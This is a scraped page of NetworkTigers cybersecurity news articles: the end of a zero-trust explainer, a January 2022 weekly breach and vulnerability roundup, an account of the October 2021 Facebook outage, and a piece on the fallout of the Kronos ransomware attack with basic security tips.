  2. Flexibility – A zero trust model has less initial set up for users than requesting access to a VPN, minimizing onboarding time. 
  3. Security – Zero trust is designed to mitigate the risks of network perimeters, or the “blast radius” if a breach does occur. 
  4. Invisibility – Despite the multiple authentications necessary, zero trust should be seamless for users. They should be able to sign in and use a strong second factor in order to conduct business as usual. 

Evolution of Zero Trust Security 

As more businesses and users utilize hybrid cloud technology to store data, zero trust is a necessary evolution within the cybersecurity landscape to help mitigate the associated increased risk. When done correctly, zero trust lives up to its motto of “never trust, always verify” and can create a stronger, safer online experience for companies, governments, and individuals.

Cybersecurity News week ending 9 Jan 2022 ~ NetworkTigers

0
Cybersecurity news

Cybersecurity news provided by NetworkTigers on Monday, 10 January 2022.

SAN MATEO, CA — Attackers attempt hacks by mailing USB drives, new Java vulnerability similar to Log4Shell, New Mexico county hit with cyberattack, years old Uber exploit finally fixed, attackers using Google Docs to spread malware, ZLoader malware in circulation, music website “DatPiff” hacked, 2021 cyberattack against UK Ministry of Defence academy revealed, Arkansas hospital payroll offline due to Kronos hack, largest media provider in Portugal attacked, Florida hospital system breached.

Attackers attempt hacks by mailing USB drives

The FBI has issued a warning to retailers that FIN7, a notorious Eastern European hacking collective, has been mailing envelopes containing USB drives to businesses that are purported to include COVID-19 information from the Department of Health and Human Services or Amazon. However, inserting the USB drive in fact injects malicious code into the user’s computer that can be used to gather data and initiate a ransomware attack. Read more.

New Java vulnerability similar to Log4Shell

A serious new Java bug has been detected that has the same root cause as the currently-trending Log4Shell vulnerability, according to researchers. A successful exploit of the bug can allow an attacker to initiate unauthenticated remote code execution. All users running the popular H2 Java SQL database are urged to update their system immediately. Read more.

New Mexico county hit with cyberattack

Bernalillo County, the most heavily populated in the state of New Mexico, has had its services disrupted by a ransomware attack on Wednesday morning. The attack has resulted in many government employees working remotely as buildings remain closed. Safety services are still operational due to backup protocols being in place, although many government services are offline due to system disruption. Read more.

Years old Uber exploit finally fixed

An exploit that would allow criminals to easily send emails to targets from Uber’s official network has finally been closed. However, researchers note that this exploit has been open since 2015 and may have already been used to trick Uber users into providing personal information and payment data. Uber users are encouraged to change their passwords and use challenging login credentials. Read more.

Attackers using Google Docs to spread malware

The comments feature of Google Docs has reportedly been used to spread malware and malicious links that primary target Outlook users, according to researchers at security firm Avanan. The vulnerability has been noted since October, but has not been fixed by Google. Attackers use the comment feature to send a notification email to their target. The nature of the email sent makes it difficult to determine whether or not it can be trusted. Read more.

ZLoader malware in circulation

ZLoader is a Trojan that is used to steal passwords, cookies and other sensitive information from infected systems. However, a new ZLoader campaign spearheaded by the malware gang Malsmoke is hiding the Trojan in a new and more difficult to spot way. ZLoader is being hidden within a “legitimate remote management program from Atera pretending to be a Java installation.” Read more.

Music website “DatPiff” hacked

Free mixtape hosting website “DatPiff” has been hacked with the passwords for more than 7.5 million users being sold online. Users can check Have I Been Pwned to determine if their accounts were affected by the breach. DatPiff account holders are being encouraged to change their passwords and login credentials to words and phrases that do no share any similarity with previously used credentials. Read more.

2021 cyberattack against UK Ministry of Defence academy revealed

In March of 2021, a cyberattack was levied against the UK Ministry of Defense (MoD) Academy that reportedly had a significant operational effect. Revealed by a retired military official, the perpetrators of the attack are still unknown leaving the possibility of state-sponsored hacking on the table. As of today, the MoD’s IT infrastructure is still being restored while stronger defenses are being implemented. Read more.

Arkansas hospital payroll offline due to Kronos hack

The University of Arkansas for Medical Sciences (UAMS)  has been reeling from the effects of December’s cyberattack on Kronos, with the hospital struggling to maintain timekeeping records and pay its employees. While the absence of Kronos’ services has been a challenge, the hospital reports that thus far all workers have been paid on time. The UAMS is the state of Arkansas’ largest public employer. Read more.

Largest media provider in Portugal attacked

Impresa, owner of the largest television station and newspaper in Portugal, has reportedly been the victim of a ransomware attack. National cable TV broadcasts are unaffected, but the company’s streaming capabilities have been taken down. The company has also had its Twitter account hacked by the attackers, who have been using it to taunt the company and report to followers that the hijackers still have access to the company’s data. The ransomware group Lapsus$ is believed to be responsible for the attack. Read more.

Florida hospital system breached

Florioda-based hospital system Broward Health has reported that it suffered a data breach on October 15th of 2021. The breach is said to have taken place through a third party organization that had access to Broward Health’s network. The compromise allowed unauthorized users the ability to both access and steal Social Security numbers, patient health data, names, addresses, banking information and more. No illegal misuse of the data has yet to be reported. Read more.

More cybersecurity news

About NetworkTigers

NetworkTigers was founded in January 1996 as Andover Consulting Group, which built and re-architected data centers for Fortune 500 firms. Today, NetworkTigers provides consulting and network equipment to businesses, health care and government agencies globally. www.networktigers.com

Cybersecurity News

NetworkTigers provides the latest industry and cybersecurity news in a weekly roundup at news.networktigers.com.

Was Facebook hacked on 4 October 2021?

0
Facebook hacked

If you opened your computer, phone or laptop and saw that social media giant Facebook no longer existed, how would you feel? For some, there might be joy at feeling finally set free from screen time. For others – especially the over 90 million small business owners with Facebook pages – there might be concern. For everyone, there would likely be a sense of shock. 

If you did log in to Facebook on 10/4/21, you may have experienced a taste of that when you saw the platform was no longer reachable. Facebook was inaccessible on 10/4/21 for many hours, with the domain name showing that it no longer existed. Many users were redirected to an error message that showed “Server can’t find facebook.com”, instead of seeing a typical “trouble loading content” page. This led many people to believe that Facebook was hacked or had been taken down, perhaps permanently. But what actually happened?

What Happened with Facebook on 10/4/21?

The company’ DNS servers were unreachable for about 6 hours on 10/4/21. The outage began around 1 pm Eastern Time, and largely affected US based users, with around 1.7 million problem reports flowing in. The outage was also global, with other countries, including Germany, the Netherlands, the United Kingdom, and Italy, reporting that the platform had stopped functioning. There were overall 5.6 million problem reports worldwide. 

The issue was resolved by around 6:30 pm Eastern Time. However, even this loss of a few hours was jarring for many users, who are accustomed to checking Facebook throughout the day. With 3.5 billion people using Facebook nearly every day, a loss of connection for even a few hours can have a massive effect. 

Other Platforms Affected by the Shutdown

Due to the consolidation of social media, Facebook’s outage also meant that many other popular communication platforms were taken down all at once. Instagram, WhatsApp, Oculus VR, and Messenger were all also inaccessible during the 6 hour period. 

Facebook’s Statement About the Shutdown

According to a statement released by Facebook’s Santosh Janardhan, the error was caused by a routine maintenance that went awry. Janardhan posted after the fact:

“During one of these routine maintenance jobs, a command was issued with the intention to assess the availability of global backbone capacity, which unintentionally took down all the connections in our backbone network, effectively disconnecting Facebook data centers globally.” 

From there, apparently a glitch in the system allowed the company’s DNS servers to become unreachable publicly, even though they were still operational. The company’s DNS servers stopped being able to read border gateway control protocol (BGP), and instead disabled access to BGP advertisements, as they began to read mistakenly as unhealthy server connections via the linked system DNS server. This slipup caused Facebook to show as unavailable, and the domain name to even be automatically listed as for sale on various marketplaces. 

Because Facebook has linked their own internal networks, the outage had far-reaching consequences. Due to the physical and system security Facebook imposes on its own data centers, engineers working to fix the problem were not able to remedy the situation immediately. Janardhan continued to explain the situation as:

Our primary and out-of-band network access was down, so we sent engineers onsite to the data centers to have them debug the issue and restart the systems. But this took time, because these facilities are designed with high levels of physical and system security in mind. They’re hard to get into, and once you’re inside, the hardware and routers are designed to be difficult to modify even when you have physical access to them. So it took extra time to activate the secure access protocols needed to get people onsite and able to work on the servers. Only then could we confirm the issue and bring our backbone back online.”

According to Facebook’s official statements, there was no external hack that brought about the temporary shutdown, simply an internal and routine maintenance error with the interconnected DNS server and its ability to read BGP. The mishap was extended by the company’s own stringent security measures. 

Rumors About the Facebook Hack

Many rumors were spread during the shutdown about what had caused it. Some common ones you may have heard were that:

  • A teenage Chinese hacker caused the shutdown. This misinformation was ironically spread largely via Facebook posts after the fact. 
  • The outage was linked to the testimony recently shared about the platform’s widespread apathy about the hate-mongering and misinformation it fosters, as well as the harm it does to teenagers’ self-images, and the genocide it reportedly helped incite in Myanmar. The day before the shutdown, Facebook whistleblower Frances Haugen revealed her identity in a 60 Minutes interview. The timing of the outage happening on the very next day caused some to speculate that the two events were related. 
  • The private data of 1.5 billion Facebook users was put up for sale following the hack. This idea was spread by Senator Marsha Blackburn of Tennessee in her remarks at a Senate Subcommittee hearing. Data including users’ email addresses, locations, phone numbers, gender, and other identifying information was purported to be for sale. This breach, however, remains unverified by several fact-checking sources. 

Effects of the Facebook Shutdown

The mass outage on 10/4/21 caused Facebook shares to drop by 4.9%, representing a loss of $40 billion to the company’s net worth.

Besides the financial consequences, many people across the globe rely on Facebook Messenger as well as WhatsApp to reach friends and family in other countries. The outage had consequences for many peoples’ abilities to know what was happening with loved ones internationally. And as the coronavirus has revealed our increasing reliance on digital connections, Facebook’s outage was even more poignant during this time. If tech giants continue to consolidate communication platforms, we may likely see many more issues moving forwards with our ability to stay connected.

What are the effects of the Kronos ransomware attack?

0
Kronos ransomware attack

The December 11th ransomware attack levied against Ultimate Kronos Group (UKG), commonly simply referred to as “Kronos,” has left organizations, businesses and individuals to fend for themselves as the effects of the human resource company’s now limited operations leave paychecks in limbo. As the new year begins, many are left still struggling after weeks without service due to the hack.

As expected, the effects of the Kronos service outage have had serious consequences across organizations both private and public. Many workers have experienced disruptions in pay, and companies are struggling to keep accurate records when it comes to hours worked, overtime and more.

Healthcare and the Kronos hack

Healthcare organizations seem to have been disproportionately affected by the disappearance of Kronos’ services. Many employees are less than optimistic when it comes to their faith in Kronos and their employers to get back on track.

Staff at University of Florida Health (UF Health) have experienced two weeks of payroll inaccuracies, with some workers looking to leave the facility and find work elsewhere as the hospital flounders with maintaining the books. 

“People are fed up. They’re gonna go. They’re not going to stay. No one wants to work for free,” said a UF Health employee who chose to remain anonymous for fear of the hospital retaliating.

“If we are recording our hours on timesheets and you know already how much we’re making and you can calculate that with a calculator, then we should do that,” the UF Health employee continued.

UF Health maintains that it is waiting for instructions from Kronos, and is doing the best it can logging hours manually. Their statement does little to comfort those who already live paycheck to paycheck.

MaineHealth, another healthcare provider and one of the state of Maine’s largest employers, has also been grappling with the effects of the Kronos hack.

“Though this ransomware attack affects employers worldwide, it is especially unfortunate that our care team members have to deal with this at a time when the pandemic is at its peak in Maine,” said chief financial officer of MaineHealth Al Swallow.

Staff members at Atlanta, Georgia’s Grady Memorial Hospital have reported receiving checks for as little as 75 cents. Some have not received checks at all.

As COVID-19 infections soar and hospital staff regularly maintain hours far in excess of their scheduled time, the additional economic pressure being experienced by those who aren’t receiving pay is placing more stress on a workforce that is already beyond the breaking point.

Public services and the Kronos hack

School districts, police departments and other public services also are feeling the pressure as the Kronos hack closes in on its third week of service disruption.

Texas’ Forth Worth Independent School District has resorted to “old fashioned” methods of time keeping. The school’s executive director of external and emergency communications, Claudia Garibay, said that the school is “working with our division of technology to develop a time capture application that we’ll have here in the near future.”

Private companies and the Kronos hack

Nestle and Tesla are two of the largest companies affected by the Kronos hack. 

Nestle spokeswoman Dana Stambaugh said that “this (hack) will have no impact on our ability to pay our employees.”

Tesla has not made a statement regarding the hack, nor has CEO Elon Musk made any mention of the hack officially or on his Twitter feed.

The effects of the Kronos hack are being experienced differently depending on how much integration a company has with their services and which of their tools they employ. 

What is Kronos doing about the ransomware attack?

For it’s part, Kronos has been keeping a logged record of their restoration process that is available for public view.

While transparency and a detailed list of the company’s efforts is laudable in a world where hacks and breaches quickly fade from both headline news and PR statements, the online archive seems perfunctory. When considered with Kronos’ initial instruction for clients to, more or less, figure out how to navigate their absence on their own, the company’s updates give the impression of a box to be checked in order to save face more so than a carefully constructed plan.

Kronos has provided a small suite of “Interim Solutions for Time and Scheduling” that include Excel files and a piece of software that will collect and store time clock punches for when services are restored. 

Many of the steps that Kronos is instructing businesses to undertake to restore services require downloading checklists, watching videos, connecting with a representative from the company and learning how to manage new methods by which to collect payroll data.

Kronos’ provided tools and recommendations put picking up the real world mess of their outage squarely on the shoulders of their customers, continuing to underline how a lack of protocols in the event of a major cyberattack can result in the responsibility for the fallout trickling down to paying customers as opposed to the organization entrusted with critical tools and data.

Kronos has reported on its status update page that those affected by the ransomware attack can expect to hear from a company agent who will assist them directly in restoring services between January 3rd and January 7th.

However, a post published on January 1st beginning with a tone deaf wish for a “happy new year” stated that more details would be forthcoming “tomorrow,” which would have been January 2nd.

As of the morning of January 3rd, no new correspondence has been posted.

The future

Undoubtedly, organizations across the country are eagerly awaiting a return to regular services as they continue to make do with pen and paper records, unlogged hours and a lack of cohesive protocols with regard to the absence of human resource services. For them, these updates may allow them to pass progress reports on to their workforces to assure them that work is underway.

However, the workers and employees directly affected by missing, lacking or inaccurate paychecks likely aren’t interested in Kronos’ “good faith” efforts to fix the mess after the fact. One can hope that the scrambling taking place in the wake of this hack will provide an incentive for more major companies to develop strict, detailed procedures to shield their customers from the effects of cyberattacks, whether successful or merely attempted.

Barring a market wide enlightenment, however, until major companies feel sufficient economic or regulatory pressure to strengthen their cybersecurity protocols and adopt responsibility for their inaction, it is likely that 2022’s ransomware and cyberattack landscape will deviate little from the trends set over the previous year. 

How to avoid cybercrime

Cybercrime doesn’t just happen to major corporations, in spite of what headline news may imply. Small businesses are often targeted by hackers due to their limited resources and their belief that they need not invest in security due to their inconspicuous size. Here are some tips to help you stay safe online:

Use strong, random passwords. Use a password generator to create impossible to guess passwords, and don’t use the same password across multiple websites or accounts.

Keep up to date on the ways in which to identify phishing scams and malicious links. The hack of Robinhood took place when a criminal convinced an employee to provide sensitive data over the phone. Cybersecurity training is key.

Check in regularly with cybersecurity news blogs and online resources

Keep your operating systems, software and apps updated. You can easily update your hardware and still keep your budget intact by purchasing refurbished equipment from a reputable supplier.

Sources